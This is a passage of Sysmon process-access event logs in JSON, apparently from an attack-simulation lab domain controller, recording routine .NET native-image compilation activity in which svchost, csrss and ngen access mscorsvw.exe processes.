{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7199,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-001066720C00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-001066720C00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7200,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.835\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010545F0B00}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.835","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010545F0B00}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7201,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.835\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010545F0B00}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.835","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010545F0B00}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7202,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.835\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010545F0B00}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.835","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010545F0B00}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7203,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.945\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222B-5F25-0000-00102F0B0B00}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.945","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222B-5F25-0000-00102F0B0B00}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7204,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.945\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222B-5F25-0000-00102F0B0B00}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.945","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222B-5F25-0000-00102F0B0B00}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7205,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222B-5F25-0000-00102F0B0B00}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222B-5F25-0000-00102F0B0B00}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7206,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.976\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-00106A7E0C00}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 